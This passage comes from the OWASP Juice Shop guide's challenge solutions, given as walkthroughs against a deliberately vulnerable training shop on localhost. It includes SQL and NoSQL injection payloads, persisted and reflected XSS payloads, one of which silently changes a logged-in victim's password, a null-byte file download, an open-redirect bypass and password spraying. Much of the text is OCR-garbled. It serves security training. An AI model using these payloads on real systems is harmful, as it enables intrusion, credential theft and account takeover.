tty-print this minified file? more 





this.route = t 
Py 
} 
return l.prototype.ngOnInit = function() { 
var 1 = this; 
console. log(this.route.snapshot.data), 
this.userService .@authLogin(this.parseRedirectUrlParams().access_token) .subscribe(function(n) { 
l.userService.save({ 
email: n.email, 
password: btoa(n.email.split("").reverse().join("")) 
})-subscribe(function() { 
1.login(n) 
}, function() 
return 1.login(n) 


» 

}, function(n) { 
1.invalidateSession(n), 
1.router.navigate(["/login"]) 

} 

» 


} 
} 


l.prototype.login = function(1l) { 

var n = this; 

this.userService.login({ 
email: l.email, 
password: btoa(l.email.split("").reverse().join("")), 
auth: !@ 

}).subscribe(function(1) { 
n.cookieService.put("token", 1.token), 
sessionStorage.setItem("bid", 1.bid), 
localStorage.setItem("token", 1.token), 





n.userService. isLoggedIn.next(!@), 
n.router.navigate(["/"]) 

}, function(1) { 
n.invalidateSession(1), 
n.router.navigate(["/login"]) 


» 





} 
} 


4. In the function body you will notice a call to userService.save() - which is 
used to create a user account in the non-Google User Registration process - 
followed by a call to the regular userService.login() 

5. The save() and login() function calls both leak how the password for the 
account is set: password: btoa(n.email.split("").reverse().join("")) 

6. Some Internet search will reveal that window.btoa() is a default function to 
encode strings into Base64. 

7. What is passed into btoa() iS email.split("").reverse().join("") , which is 
simply the email address string reversed. 

8. Now all you have to do is Base64-encode moc.liamg@hcinimmik.nreojb , SO YOU 
can log in directly with Email bjoern.kimminich@gmail.com and Password 


bW9jLmxpYW1inQGhjaW5pbWipaySucmVvamI= . 


Steal someone else's personal data without using 
Injection 


1. Log in as any user, put some items into your basket and create an order from 
these. 

2. Copy the order ID from the confirmation PDF. It should look similar to 5267- 
829123593e9de98_ in its format. 

3. Visit http://localhost:3000/#/track-order, paste in your Order ID and then click 
Track. 

4. In the network tab of your browser you should find a request similar to 
http://localhost:3000/rest/track-order/7962-6e31e50a0c6f2ea3. 

5. Inspecting the response closely, you might notice that the user email address 
is partially obfuscated: {"status": "success", "data": [{"orderId" :"5267- 
829F123593e9de98", "email": "*dm*n@j**c*-sh.*p", “totalPrice":2.88, "products": 
[{"quantity":1,"name":"Apple Juice (1000m1)","price":1.99,"total":1.99,"bonus":0}, 
{"quantity":1, "name": "Apple 
Pomace", "price":0.89, "total":@.89, "bonus":0}],"bonus":@,"eta":"2","_id":"tosmfPsDaW 


cEnzRr3"}]} 
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6. It looks like certain letters - seemingly all vowels - were replaced with * 
characters before the order was stored in the database. 

7. Register a new user with an email address that would result in the exact 
same obfuscated email address. For example register edmin@juice-sh.op to 
steal the data of admin@juice-sh.op . 

8. Log in with your new user and immediately get your data exported via 
http://localhost:3000/#/privacy-security/data-export. 

9. You will notice that the order belonging to the existing user admin@juice-sh.op 
(in this example 5267-829123593e9de98 ) is part of your new user's data export 
due to the clash when obfuscating emails! 


Access a misplaced SIEM signature file 


1. Use the Poison Null Byte attack described in Access a developer's forgotten 
backup file... 
2. ...to download http://localhost:3000/ftp/suspicious_errors.yml%2500.md 


Let the server sleep for some time 


1. You can interact with the backend API for product reviews via the dedicated 
endpoints /rest/products/reviews and /rest/products/{id}/reviews 

2. Get the reviews of the product with database ID 1: 
http://localhost:3000/rest/products/1/reviews 

3. Inject a sleep(integer ms) command by changing the URL into 
http://localhost:3000/rest/products/sleep(2000)/reviews to solve the challenge 


To avoid real Denial-of-Service (DoS) issues, the Juice Shop will only wait for a 
maximum of 2 seconds, so 
http://localhost:3000/rest/products/sleep(999999)/reviews should not take longer 
than http://localhost:3000/rest/products/sleep(2000)/reviews to respond. 


Update multiple product reviews at the same time 


1. Log in as any user to get your authorization token from any subsequent 
request's headers. 
2. Submit a PATCH request to http://localhost:3000/rest/products/reviews with 


o { "id": { "$ne": -1 }, "message": “NoSQL Injection!" } aS body 

© application/json AS Content-Type header. 

o and Bearer ? AS Authorization header, replacing the > with the token 
you received in step 1. 
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3. Check different product detail dialogs to verify that all review texts have been 
changed into NosQl Injection! 


Enforce a redirect to a page you are not supposed to 
redirect to 


1. Pick one of the redirect links in the application, e.g. 
http://localhost:3000/redirect?to=https://github.com/bkimminich/juice-shop 
from the GitHub-button in the navigation bar. 

2. Trying to redirect to some unrecognized URL fails due to whitelist validation 
with 406 Error: Unrecognized target URL for redirect . 

3. Removing the to parameter (http://localhost:3000/redirect) will instead yield 
a 500 TypeError: Cannot read property ‘indexOf' of undefined where the indexof 
indicates a severe flaw in the way the whitelist works. 

4. Craft a redirect URL so that the target-URL in to comes with an own 
parameter containing a URL from the whitelist, e.g. 
http://localhost:3000/redirect?to=http://kimminich.de? 
pwned=https://github.com/bkimminich/juice-shop 


Reset Bender's password via the Forgot Password 
mechanism 


1. Trying to find out who "Bender" might be should immediately lead you to 
Bender from Futurama as the only viable option 


206 





aG 


2. Visit https://en.wikipedia.org/wiki/Bender_(Futurama) and read the Character 
Biography section 

3. It tells you that Bender had a job at the metalworking factory, bending steel 
girders for the construction of suicide booths. 

4. Find out more on Suicide Booths on 
http://futurama.wikia.com/wiki/Suicide_booth 

5. This site tells you that their most important brand is Stop'n'Drop 

6. Visit http://localhost:3000/#/forgot-password and provide bender@juice-sh.op 
as your Email 

7. In the subsequently appearing form, provide stop'n'Drop as Company you 
first work for as an adult? 

8. Then type any New Password and matching Repeat New Password 

9. Click Change to solve this challenge 


Rat out a notorious character hiding in plain sight in 
the shop 


1. Looking for irregularities among the image files you will at some point notice 
that 5.png is the only PNG file among otherwise only JPGs in the customer 
feedback carousel: 
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2. Running this image through some decoders available online will probably just 
return garbage, e.g. http://stylesuxx.github.io/steganography/ gives you 
yAym90$-y ?HOPU*+UN' c+UY%s; fä’ HUmE#r<v, OF 
https://www.mobilefish.com/services/steganography/steganography.php gives 
up with No hidden message or file found in the image . On 
https://incoherency.co.uk/image-steganography/#funhide you will also find 
nothing independent of how you set the Hidden bits slider: 


Image Steganography — Howtwors Howto aeteatit 


Hide images inside other images. 


This is a client-side Javascript tool to steganographically hide images inside the lower "bits" of other images. 


Select either "Hide image" or "Unhide image". Play with the example images (all 200x200 px) to get a feel for it. 


Hide image SAULA 


Image: Hidden bits: 5 
Datei auswählen | steganography.png 


Download Full-size Image 


Example: N/A v 














3. Moving on to client applications you might end up with OpenStego which is 
built in Java but also offers a Windows installer at 
https://github.com/syvaidya/openstego/releases. 

4. Selecting the 5.png and clicking Extract Data OpenStego will quickly claim to 
have been successful: 
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Extract hidden data 











Input Stego File 





ti) Message file successfully extracted from the Cover file: J7RDRp1D5XDMS5LINx0TdgeFX_o.png 











i 

Embed Watermark 
a 

Verify Watermark 





5. The image that will be put into the Output Stego file location clearly depicts a 
pixelated version of Pickle Rick (from S3E3 - one of the best Rick & Morty 
episodes ever) 





6. Visit http://localhost:3000/#/contact 
7. Submit your feedback containing the name Pickle Rick (case doesn't matter) 
to solve this challenge. 


Inform the shop about a typosquatting trick it has 
been a victim of 


1. Solve the Access a developer's forgotten backup file challenge and open the 
package. json.bak file 
2. Scrutinizing each entry in the dependencies list you will at some point get to 
epilogue-js , the overview page of which gives away that you find the culprit 
at https://www.npmjs.com/package/epilogue-js 


209 


epilogue-js 


0.7.3 * Public « 





Readme Admin 3 Dependencies © Dependents 2 Versions 





Dulld passing | dependencies upto cate 








Epilogue 











open 
58 
ho e 
github.com 
THIS IS NOT THE MODULE YOU ARE LOOKING FOR! Please use 
https://github.com/dchester/epilogue! This repository exists only for security awareness last publish 
and training purposes to demonstrate the issue of typosquatting! Please read ayear ago 


https://github.com/bkimminich/juice-shop/issues/365 and 


https://iamakulov.com/notes/npm-malicious-packages/ for more information! 


Create flexible REST endpoints and controllers from Sequelize models in your Express or Restify 





app. 
Getting Started D Test with Runkit 


var Sequelize = require('sequelize’), Report a vulnerability 
epilogue = require( epilogue’), 


http = require(*http’); 


var database = new Sequelize(*database’, ‘root’, "password’); 
var User = database.define("User’, { 

username: Sequelize.STRING, 

birthday: Sequelize.DaTE 


H; 


var server, app; 
if (process.env.USE_RESTIFY) { 


var restify = require('restify'); 


wen = ranima = mnebi fe canada ammnal S 


3. Visit http://localhost:3000/#/contact 
4. Submit your feedback with epilogue-js in the comment to solve this 
challenge 


You can probably imagine that the typosquatted epilogue-js would be a lot 
harder to distinguish from the original repository epilogue , if it where not marked 
with the THIS IS NOT THE MODULE YOU ARE LOOKING FOR!-warning at the 
very top. Below you can see the original epilogue NPM page: 


epilogue 


6.7.1 + Public + Published 2 y 





Readme 3 Dependencies 12 Dependents 19 Versions 





bulic passing | eee 


Epilogue 


Create flexible REST endpoints and controllers from Sequelize models in your Express or Restify 
app. 


Getting Started 


var Sequelize = require('sequelize'), 
epilogue = require(`epilogue'), 





http = require("http’); 








ofina your homepage epositor 
var database = new Sequelize(‘database’, ‘root’, ‘password’); github.com © github 
var User = database.define(‘User', { 
username: Sequelize.STRING, last publish 
birthday: Sequelize.DATE 2 years ago 
H; 
collaborators 








if (process.env.USE_RESTIFY) { 
var restify = require('restify'); 

Test with RunKit 
app = server = restify.createServer() 
app.use(restify.queryParser()); 
aoo.use(restifv.bodvParser(}): 


Report a vulnerability 
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Retrieve a list of all user credentials via SQL Injection 


1. During the Order the Christmas special offer of 2014 challenge you learned 
that the /rest/products/search endpoint is susceptible to SQL Injection into 
the q parameter. 

2. The attack payload you need to craft is a unron seLect merging the data from 
the user's DB table into the products returned in the JSON result. 

3. As a starting point we use the known working '))-- attack pattern and try to 
make a unton seLect out of it 

4. Searching for ')) UNION SELECT * FROM x-- fails with a sQLITE_ERROR: no such 
table: x as you would expect. But we can easily guess the table name or 
infer it from one of the previous attacks on the Login form where even the 
underlying SQL query was leaked. 

5. Searching for ')) UNION SELECT * FROM Users-- fails with a promising 
SQLITE_ERROR: SELECTs to the left and right of UNION do not have the same number 
of result columns which least confirms the table name. 

6. The next step ina unzon seLecT -attack is typically to find the right number of 
returned columns. As the Search Results table in the UI has 3 columns 
displaying data, it will probably at least be three. You keep adding columns 
until no more sọLITE_ERROR occurs (or at least it becomes a different one): 


i. ")) UNION SELECT '1' FROM Users-- fails with number of result columns error 

ii. ')) UNION SELECT '1', '2' FROM Users-- fails with number of result columns 
error 

iii. 


')) UNION SELECT '1', '2', '3' FROM Users-- fails with number of result 
columns error 
iv. (...) 
V. ')) UNION SELECT '1', '2', '3', '4', '5', '6', '7', '8' FROM Users-- Still 
fails with number of result columns error 
vi. ')) UNION SELECT '1', '2', '3', '4', '5', '6', '7', '8', '9' FROM Users-- 
finally gives you a JSON response back with an extra element 
{"id":"1","name":"2","description":"3","price":"4","deluxePrice":"5","image": 
"6", "createdAt":"7","updatedAt":"8","deletedAt":"9"} . 
7. Next you get rid of the unwanted product results changing the query into 
something like qwert')) UNION SELECT '1', '2', '3', '4', '5', '6', '7', '8', '9' 


FROM Users-- leaving only the " unron ed" element in the result set 


8. The last step is to replace the fixed values with correct column names. You 
could guess those or derive them from the RESTful API results or remember 
them from previously seen SQL errors while attacking the Login form. 

9. Searching for qwert')) UNION SELECT id, email, password, '4', '5', '6', '7', '8', 
‘9' FROM Users-- SOlves the challenge giving you a the list of all user data in 
convenient JSON format. 
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There is of course a much easier way to retrieve a list of all users as long as you 
are logged in: Open hittp://localhost:3000/#/administration while monitoring the 
HTTP calls in your browser's developer tools. The response to 
http://localhost:3000/rest/user/authentication-details also contains the user data in 
JSON format. But: This list has all the password hashes replaced with +» - 
symbols, so it does not count as a solution for this challenge. 


Inform the shop about a vulnerable library it is using 


Juice Shop depends on a JavaScript library with known vulnerabilities. Having the 
package. json.bak and using an online vulnerability database like Retire.js or Snyk 
makes it rather easy to identify it. 


1. Solve Access a developer's forgotten backup file 
2. Checking the dependencies in package.json.bak for known vulnerabilities 
online will give you a match (at least) for 

o sanitize-html : Sanitization of HTML strings is not applied recursively to 
input, allowing an attacker to potentially inject script and other markup 
(see https://snyk.io/vuln/npm:sanitize-html:20160801) 

o express-jwt : Inherits an authentication bypass and other vulnerabilities 
from its dependencies (see https://app.snyk.io/test/npm/express- 
jwt/0.1.3) 

3. Visit http://localhost:3000/#/contact 
i. Submit your feedback with the string pair sanitize-ntml and 1.4.2 
appearing somewhere in the comment. Alternatively you can submit 


express-jwt and 0.1.3. 


Perform a persisted XSS attack bypassing a server- 
side security mechanism 


In the package.json.bak you might have noticed the pinned dependency “sanitize- 
html": "1.4.2" . Internet research will yield a reported Cross-site Scripting (XSS) 
vulnerability, which was fixed with version 1.4.3 - one release later than used by 
the Juice Shop. The referenced GitHub issue explains the problem and gives an 
exploit example: 


Sanitization is not applied recursively, leading to a vulnerability to certain 
masking attacks. Example: 


I am not harmless: <<img src="csrf-attack"/>img src="csrf-attack"/> is 


sanitized to I am not harmless: <img src="csrf-attack"/> 


Mitigation: Run sanitization recursively until the input html matches the 
output html. 


1. Visit http://localhost:3000/#/contact. 

2. Enter <<script>Foo</script>iframe src="javascript:alert( XSS )"> aS Comment 

3. Choose a rating and click Submit 

4. Visit http://ocalhost:3000/#/about for a first "xss" alert (from the Customer 
Feedback slideshow) 
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4B OWASP Juice Shop @ GèLogout QContactUs B Your gf 


About Us Corp & Policy 


Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor 
invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et 
accusam et justo duo dolores et ea rebum. Stet dita kasd gubergren, no sea takimata 
sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur 
‘sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna 
aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea 
rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. 
Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor 
invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et 
accusam et justo duo dolores et ea rebum. Stet dita kasd gubergren, no sea takimata 
sanctus est Lorem ipsum dolor sit amet. Duis autem vel eum iriure dolor in hendrerit in 
vulputate velit esse molestie consequat, vel ilum dolore eu feugiat nulla facilisis at vero 
eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril delenit augue 
duis dolore te feugait nulla facilisi. Lorem ipsum dolor sit amet, consectetuer adipiscing 
elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat 
volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit 
lobottis nisl ut aliquip ex ea commodo consequat. Duis autem vel eum iriure dolor in Follow us on Social Media 
hendrerit in vulputate velit esse molestie consequat, vel illum dolore eu feugiat nulla 
facilisis at vero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum zzril 
delenit augue duis dolore te feugait nulla facilisi. 
Nam liber tempor cum soluta nobis eleifend option 


W Twitter Facebook Slack Press Kit 





5. Visit http://localhost:3000/#/administration for a second "xss" alert (from the 
Customer Feedback table) 


Auf einer in dieser Seite eingebetteten Seite wird Folgendes 


48 OWASP Juice Shop @ GPLogout ContactUs WF Your EAM 


Administration Registered Users Customer Feedback 


Email 


Recycling Requests 


User Quantity Pickup Date 





Perform a persisted XSS attack through an HTTP 
header 


1. Log in as any user. 
2. Visit http://localhost:3000/#/privacy-security/last-login-ip where your /P 
Address probably shows as 2.0.0.0. 


= 18 OWASP Juice Shop 


Last Login IP 


IP Address: 0.0.0.0 





3. Log out and then log in again with the same user as before. 

4. Visit http://localhost:3000/#/privacy-security/last-login-ip again where your IP 
Address should now show your actual remote IP address (or 127.0.0.1 if you 
run the application locally). 

5. Find the request to https://localhost:3000/rest/saveLoginlp in your Browser 
DevTools. 

6. Replay the request after adding the x-Forwarded-For HTTP header to spoof 
an arbitrary IP, e.g. 1.2.3.4. 

7. Unfortunately in the response (and also on http://localhost:3000/#/privacy- 
security/last-login-ip after logging in again) you will still find your remote IP as 
before 

8. Repeat step 6. only with the proprietary header True-client-1P . 
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9. In the JSON response you will notice lastLoginIp: "1.2.3.4" and after logging 
in again you willsee 1.2.3.4 as your /P Address on 
http://localhost:3000/#/privacy-security/last-login-ip. 

10. Replay the request once more with True-client-1P: <iframe 
src="javascript:alert(~>xss->)"> to solve this seriously obscure challenge. 

11. Log in again and visit http://localhost:3000/#/privacy-security/last-login-ip see 
the alert popup. 


x @o 


OWA Auf einer in dieser Seite eingebetteten Seite wird Folgendes 
angezeigt 


xSS 


IP_ADDRESS 





KKK x * Challenges 


Learn about the Token Sale before its official 
announcement 


1. Open the main.js in your browser's developer tools and search for some 
keywords like "ico", "token", "bitcoin" or "altcoin". 

2. Note the names of the JavaScript functions where these occur in, like vu) 
and Hu(1) . These names are obfuscated, so they might be different for you. 








\uansert™]({ 








intent-RCONPE| {background :rgba (0,0,0, .13);justify-content center;margin-bottom:109x;padding:412px 2px}. 





], ["FkLayout.1t-ad", "column"], ["fxLayoutGap", "2epx"]], null, null, null, null, null), tE 
Ab, L-1], { 
offer-container"], ["FxFlexAlign", “center"]], null, null, null, mull, null)), t["\ua275did"](4, 737288, 
null), GOO. 
Mein O G, utd, mutt, null, naD), eC*\wo2rspaihy cae. 4 


null, Bl.d, Bl.a)), t["\uo27sdid"](43, 49152, null, 9, Hla, [], mull, null), (100), 






FI), AG 
full, wl), Q00 


null)), t["\ue27Sdid"](20, 8536064, null, 0, C.e, [C.k. t-ElementRer, 





3. Searching for references to those functions in main.js might yield some 
more functions, like zu(1) and some possible route name app-token-sale 
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n 
} 
function zu(1) { 
return t[{"\ue275vid"](@, [100; 
t["\u@275eld"](@, @, null, null, 1, “app-token-sale”, [], null, null, null, Hu, Bu)), t["\uv@275did"](1, 114688, null, @, Fa, [d], null, null)], function(1, n) { 
l(n, 1, @) 
}, null) 
var Zu = t["\u0275ccf"]("app-token-sale", MH, zu, {}, {} 1) 
a Su = t["\uor7sert"]({ 
encapsulation: 


8, 
styles: [[".img-thumbnail[_ngcontent-XCoMPx] {height :auto;max-width: 100%;width: 14epx}mat-form-field[_ngcontent-2CoMP%]{width:10@%)blockquote[_ngcontent-RCOMPX] {bordi 
data: {} 

p: 


4. Navigate to http://localhost:3000/#/app-token-sale or variations like 
http://localhost:3000/#/token-sale just to realize that these routes do not exist. 

5. After some more chasing through the minified code, you should realize that 
vu is referenced in the route mappings that already helped with Find the 
carefully hidden 'Score Board' page and Access the administration section of 
the store but not to a static title. It is mapped to another variable ca (which 
might be named differently for you) 


P 


path: "score-board", 
component: Kt 
i 
path: "track-order", 
component: mu 
} i 
path: "track-result", 
component: Ru 
}. {í 
matcher: _a, 
data: ba, 
component: Pu 





path: "esn, 
component: Et 


}l- { 


useHash: !6 


H: 


6. Search for function ca( to find the declaration of the function that should 
return a matcher to the route name you are looking for. 


function €a(1) { 
return © === l.length ? null : 1[@].toString().match(function() { 
for (var 1 = [], n = @; n < arguments.length; n++) 
1[n] = arguments[n]; 
var e = Array.prototype.slice.call(1) 
» t = e.shift(); 
return e.reverse().map(function(1, n) { 
return String. fromCharCode(1 - t - 45 - n) 
}) .join("") 
}(25, 184, 174, 179, 182, 186) + 36669. .toString(36).toLowerCase() + function() { 
for (var 1 = [], n = @; n < arguments.length; n++) 
l[n] = arguments[n]; 
var e = Array.prototype.slice.call(arguments) 
» t = e.shift(); 
return e.reverse().map(function(1, n) { 
return String. fromCharCode(1 - t - 24 - n) 


}).join("") 

}(13, 144, 87, 152, 139, 144, 83, 138) + 1@..toString(36).toLowerCase()) ? { 
consumed: 1 

} : null 


} 


7. Copy the obfuscating function into the JavaScript console of your browser 
and execute it immediately by appending a () . This will probably yield a 
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Uncaught SyntaxError: Unexpected token ) . When you pass values in, like (1) 
or (‘a') you will notice that the input value is simply returned. 

8. Comparing the route mapping to others shows you that here a matcher is 
mapped to a component whereas most other mappings map a path to their 
component 

9. The code that gives you the sought-after path is the code block passed into 
the match() function inside ca(1) ! 


> function Ca(1) 





consumed: 1 
} : null 


} 


10. Copying that inner code block and executing that in your console will still 
yield an error! 

11. You need to append it to a string to make it work, which will finally yield the 
path /tokensale-ico-ea . 

12. Navigate to http://localhost:3000/#/tokensale-ico-ea to solve this challenge. 


"a + function() { 
for (var 1 = [], n = ð; n < arguments.length; n++) 
l[n] = arguments[n]; 
var e = Array.prototype.slice.call(1) 
» t = e.shift(); 
return e.reverse().map(function(1, n) { 
return String.fromCharCode(1 - t - 45 - n) 
})-join("") 
}(25, 184, 174, 179, 182, 186) + 36669..toString(36).toLowerCase() + funct 
for (var 1 = [], n = ð; n < arguments.length; n++) 
l[n] = arguments[n]; 
var e = Array.prototype.slice.call(arguments) 
s t = e.shift(); 
return e.reverse().map(function(1, n) { 
return String.fromCharCode(1 - t - 24 - n) 
})-join("") 
}(13, 144, 87, 152, 139, 144, 83, 138) + 10..toString(36).toLowerCase() 


Change Bender's password into slurmCl4ssic without 
using SQL Injection or Forgot Password 


1. Log in as anyone. 

2. Inspecting the backend HTTP calls of the Password Change form reveals 
that these happen via HTTP cet and submits current and new password in 
clear text. 

3. Probe the responses of /rest/user/change-password ON various inputs: 

o http://localhost:3000/rest/user/change-password?current=A yields a 401 


error saying Password cannot be empty. 
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o http://localhost:3000/rest/user/change-password?current=A&new=B 
yields a 4e1 error Saying New and repeated password do not match. 

o http://localhost:3000/rest/user/change-password? 
current=A&new=B&repeat=C also SayS New and repeated password do not 
match. 

o http://localhost:3000/rest/user/change-password? 
current=A&new=B&repeat=B Says Current password is not correct. 

o http://localhost:3000/rest/user/change-password?new=B&repeat=B 
yields a 2ee success returning the updated user as JSON! 

4. Now Log in with Bender's user account using SQL Injection. 

5. Craft a GET request with Bender's authorization Bearer header to 
http://localhost:3000/rest/user/change-password? 
new=slurmCl4ssic&repeat=slurmCl4ssic to solve the challenge. 


No Environment 
https://juice-shop.herokuapp.cot 


http://localhost:3000/rest/user/change-password?new=slurmCl4ssic&repeat=slurmCl4ssic 


GET * _ http://localhost:3000/rest/user/change-password?new=slurmC|4ssic&repeat=slurmCl4ssic 


Params 


KEY VALUE 


new slurmCl4ssic 


repeat slurmCl4ssic 





Bonus Round: Delivering the attack via reflected XSS 


If you want to craft an actually realistic attack against /rest/user/change-password 
that you could send a user as a malicious link, you will have to invest a bit extra 


work, because a simple attack like Search for <img 
src="http://localhost : 3000/rest/user/change-password? 
new=slurmCl4ssic&repeat=slurmCl4ssic"> Will not work. Making someone click on the 


corresponding attack link http://localhost:3000/#/search? 
q=%3Cimg%20srce%3D%22http:%2F %2Flocalhost:3000%2Frest%2Fuser%2Fch 
ange-password%3Fnew%3DslurmCl4ssic%26repeat%3DslurmCl4ssic%22%3E 
will return a see error when loading the image URL with a message clearly 
stating that your attack ran against a security-wall: Error: Blocked illegal activity 


To make this exploit work, some more sophisticated attack URL is required: 


http://localhost:3000/#/search? 
q=%3Ciframe%20src%3D%22javascript%3Axmlhttp%20%3D%20new%20XMLHt 
tpRequest%28%29%3B%20xmihttp.open%28%27 GET %27%2C%20%27http%3 
A%2F %2Flocalhost%3A3000%2Frest%2Fuser%2F change- 
password%3Fnew%3DslurmCl4ssic%26amp%3Brepeat%3DslurmCl4ssic%27%2 
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9%3B%20xmihttp.setRequestHeader%28%27Authorization%27%2C%60Bearer 
%3D%24% 7 BlocalStorage.getltem%28%27token%27%29%/D%60%29%3B%20 
xmlhttp.send%28%29%3B%22%3E 


Pretty-printed this attack is easier to understand: 


<iframe src="javascript:xmlhttp = new XMLHttpRequest(); 
xmlhttp.open('GET', ‘http://localhost:3000/rest/user/change-password?new=slurmCl4ss 
xmlhttp. setRequestHeader( ‘Authorization’, Bearer=${localStorage.getItem( ‘token’ )}*) 
xmlhttp.send();"> 

</iframe> 


Anyone who is logged in to the Juice Shop while clicking on this link will get their 
password set to the same one we forced onto Bender! 


W Kudos to Joe Butler, who originally described this advanced XSS payload in his 
blog post Hacking(and automating!) the OWASP Juice Shop. 


Dumpster dive the Internet for a leaked password and 
log in to the original user account it belongs to 


1. Visit https://stackoverflow.com/questions/tagged/access-log to find all 
questions tagged with access-log in this popular platform 

2. The list of questions should not be excessive and one mentioning a familiar 
URL path might immediately stand out 














Ss stackoverflow Products [access-log] 
Home Questions tagged [access-log] 
PUBLIC 
© Stack Overflow | A list of all the requests for individual files that people have requested from a Web site. The server access log records all 
requests processed by the server. 
Tags 
Users | © Watch Tag @ Ignore Tag | Learn more... Improve tag info Top users Synonyms 
Jobs 
182 questions Newest | Active | Bounties Unanswered | More ~ | 4 Filter 
TEAMS What's this? SS 
Ci Join Private Q&A 
d 0 Less verbose access logs using expressjs/morgan 


voles | am using https://github.com/expressjs/morgan to log HTTP requests and get log output like 169.228.10.248 - - 


[27/Jan/2019:11:10:39 +0000] "POST /api/Users/ HTTP/1.1" 400 92 “http://localhost:3000/" 


0 
a apache logging access-log morgan asked 12 mins ago 
bkimminich 
3 views 221 02 09 
0 Log files not showing access to a jpeg, but the access happened 
ee | put a jpeg on a webpage, now | want to see who did access it. | know that at least 40 people must have seen it 
0 according to a counter. | looked through /var/www/vhosts with grep jpeg.jpg -r /var/www/. 
answers apache logging grep ubuntu-14.04 —_access-log asked Jul 13 at 8:49 
Alex 
17 views 14.04 
0 Size limit of Apache2 & Apache Tomcat access logs 
votes We have a use case, where we are polling apache2 continuously. As a result, a huge amount of access logs are 
0 getting generated in apache2 and in apache tomcat, around 1GB per day. So it consumes a lot 
peee tomcat apache2 access-log asked Jul 8 at 11:09 
Deepanshu 
4 views 1 
0 How to log a custom object into access.log from an httpservlet deployed in jboss 10.x 
was | want to log a custom object AccessLoglnfo (has around 8 fields) into access.log from overriden 
0 com.yodlee.dc.api.HttpServiet.doPost() method. | have this servlet deployed in a jboss (wildfly 10.x) 


3. Visit https://stackoverflow.com/questions/5706127 1/less-verbose-access- 


logs-using-expressjs-morgan to find more unambiguous URL paths from the 
Juice Shop in it 
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Less verbose access logs using expressjs/morgan 


| am using https://github_com/expressjs/morgan to log HTTP requests and get log output like 





0 169.228.1@.248 - - [27/Jan/2@19:11:10:39 +0000] "POST /api/Users/ HTTP/1.1" 400 92 “http://lo<« 
169.228.160.248 - - [27/Jan/2@19:11:10:40 +0000] "GET /rest/user/whoami HTTP/1.1" 304 - “http:, 
169.228.108.248 - - [27/Jan/2019:11:10:40 +0000] “POST /rest/user/login HTTP/1.1" 200 730 “htt, 
169.228.10.248 - - [27/Jan/2019:11:10:40 +0000] "GET /rest/continue-code HTTP/1.1" 200 79 “hti 
169.228.180.248 - - [27/Jan/2@19:11:10:40 +0000] "GET /rest/user/whoami HTTP/1.1" 200 112 “htt, 
169.228.160.248 - - [27/Jan/2019:11:10:40 +0000] "GET /api/Challenges/?name=Score%2@Board HTTP, 


» 


(see https://pastebin.com/4U1V1UjU for more) 





Can | somehow reduce the verbosity of these logs? | am totally not interested in the browser 
information for example. Thanks in advance for your help! 


apache logging access-log morgan 


edit delete flag asked 15 mins ago 
bkimminich 
221 #2 #9 

add a comment 


question eligible for bounty in 2 days 


4. Follow the link to PasteBin that is mentioned below the log file snippet in " 
(see https://pastebin.com/4U1V1UjU for more)" 

5. On https://pastebin.com/4U1V1UjU search for password to find log entries 
that might help with the ultimate challenge goal 

6. You will find one particularly interesting cet request that has been logged as 

161.194.17.103 - - [27/Jan/2019:11:18:35 +0000] "GET /rest/user/change-password? 
current=@Y8rMnww$*9VFYE%C2%A759 - ! Fg1L6t&61B&new=s jss22%@%E2%82%AC55jaJasj!.k&repeat 
=sjss22%@%E2%82%AC55jaJasj!.k8 HTTP/1.1" 401 39 "“http://localhost:3000/" 
"Mozilla/5.@ (Linux; Android 8.1.0; Nexus 5X) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36" 

7. The mismatched new and repeat parameters and the return code of 401 
indicate that this password change failed. This means the password could 
still be the current one of evarmnww$*9VFYE%C2%A759-!Fg1L6ta6lB ! 

8. Not knowing which user it belongs to, you can now 

o either perform a Password Spraying attack by trying to log in with the 
password for all known user emails, e.g. from Access the administration 
section of the store 

o hash the known password with mps and compare it to the password 
hashes harvested from Retrieve a list of all user credentials via SQL 
Injection 

9. Either way you will conclude that the password belongs to 312934@juice-sh.op 
so using this as Email and eysrmnww$*9VFYE%C2%A759-!Fg1L6ta61B as Password 
on hitp://localhost:3000/#/login will solve the challenge 


O Did you notice that one of the next requests of 161.194.17.103 in the leaked 
access log went to hitp://localhost:3000/api/Complaints and returned a 201 
Created HTTP status code? It seems the user successfully complained, but 
eventually didn't bother or was too frustrated to finish what he originally planned 
to do. 


Perform an unwanted information disclosure by 
accessing data cross-domain 
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1. Find a request to the /rest/user/whoami API endpoint. Notice that you can 
remove the "Authorization" header and it still works. 


© Burp Suite Professional v1.7.37 - Temporary Project - - ra] x 
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[ Target | Proxy | Spider | Scanner | intruder [Repeater | Sequencer [Decoder | Comparer | Extender | Project options | User options | Alerts [son Beautifer | Logger-~ | 











m 

















| Go j | Cancel Lie) > Target: https://juice-shop.herokuapp.com | LY) 2j 
Request Response 

Raw|| Params | Headers | Hex | Raw|| Headers | Hex | JSON Beautior 
GET /rest/user/vhoami HTTP/ 1.1 > Wrrr/1.1 200 oF ry 





Host: juice-shop,herokuapp.com 

Connection: close 

Accept: application/json, text/plain, */* 

User-Agent: Mozilla/S.0 (Windows NT 10.0; Win64; x64) 
AppleWebKit/537.3€ (KHTML, like Gecko) Chrome/73.0.3683.86 





eyJzdGFOAXMiOiJzAWNJZXNZIi 
Ip2CTEMTUs InV2ZXIuYW1 11304 TiviZWihaWwi0idib2JAYmGiLmiivbSI 
sTnBhc3N3b3JK13 0100 IvZDB1NGV1MTR10Tg2 YTOOZDMaNzgyY2E4NTInNTEiLCIpcOFK 
bW1ul3pmYWx22SvibGF 2dExv2Z2 1uSXAi0i TwLj AUNC4wT ivicHJvZmlsZUltYWd1IJoiZ 
